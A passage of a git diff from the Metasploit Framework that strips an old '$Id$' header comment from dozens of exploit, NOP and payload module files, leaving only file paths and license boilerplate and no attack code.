file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index b0c111b2c7..cae29bc75c 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 185d432122..b7d03ed480 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index f28dba1868..4c44d7a318 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 4d71b39f69..bafce063a7 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index a6672785ca..70540890bf 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 5388850f64..8777b1e68c 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 33f523dcee..951b9d18a1 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index 34446c6f14..ebbdd5bfac 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 2fbc86ecba..9f0a65be70 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index b1b65e915d..1ff0e5f9bd 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index e60da6e5a3..924aced2e8 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 6908e6f5bc..c195e62b9b 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index 44e1d94079..899f3dcb82 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index 4f7e02823c..2d89211b40 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index edf6593d20..03fc5e4931 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index b0b94261d8..982968ef76 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index 1fea3f1f5f..a124ec9b90 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index cfd7f1cc08..7a2562bcaa 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 108f62edb4..640fe6e801 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 95151dce66..5eac1166bf 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index 2b34063831..004c90232e 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 50b342259e..05fac2e4ec 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 9f8d39a855..ca14a6e580 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index 61079561d3..1568d286ab 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index fe3f524f58..a93aadd0f4 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 133f674f66..a11dbe6a6a 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 3cb4c75ce5..d7e1bed10b 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 0de658d54a..690d6790c0 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 6edaf84865..76cd430efe 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 63ffaca328..684e5ce990 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index d8eac92783..306b370a50 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 6d51e5c78b..315228ba6b 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index cc90014957..c67505ee86 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 0b995bc85d..15f7586966 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 4b0dacab5b..f8915d4189 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 51a6ba6641..c8eb8a0289 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index aad5e9d201..6b6ee6abca 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 6492658b65..ea2581a231 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index 0c54636d80..876ee4caba 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 4edda261bc..0f2aea4290 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 4dd150fe38..65c1e3c468 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 4603033a15..208585b229 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index f31a29102b..579ca014e8 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index ff6ae53b57..666ca66d3d 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index b8c362841f..7f8fecd435 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index 51bc94484e..3d55a37a69 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/nop_test.rb.ut.rb b/modules/nops/nop_test.rb.ut.rb index 272f475742..17a5a201ad 100644 --- a/modules/nops/nop_test.rb.ut.rb +++ b/modules/nops/nop_test.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index e97b5683f1..602fa44946 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 246a7ad2e4..64e60fe345 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 41856b584b..26caa3e121 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 2a94cc5ea0..177669cff9 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 00c2b22d4c..40f2dbfa83 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index c095ff099f..c0ec17e6a0 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 0cc248d47c..3dba13f0c1 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 207588a7f9..e66c898fb1 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 36a74b3b33..d92ed471ad 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 39d0715bfe..a13c17fd9d 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index e40599da01..8516aa14c7 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index 0f1034d57d..76d5326ac6 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index ff302dfe23..85bb4003b9 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index 5881af1ec1..c93fb05aa0 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index 6c6a2988d0..96adfcc486 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 5119baaac0..1b20d8a914 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index 9e624ec85c..c0a18c8f59 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index 1bb8509ac9..c37c6bbde0 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index b82685cbea..fd787313f7 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 344518b3ef..08b849d867 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index 766bfb6307..ae8bd3b9e7 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 8d3f86dea1..226268102f 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 120111bd5d..54c2206d5d 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb 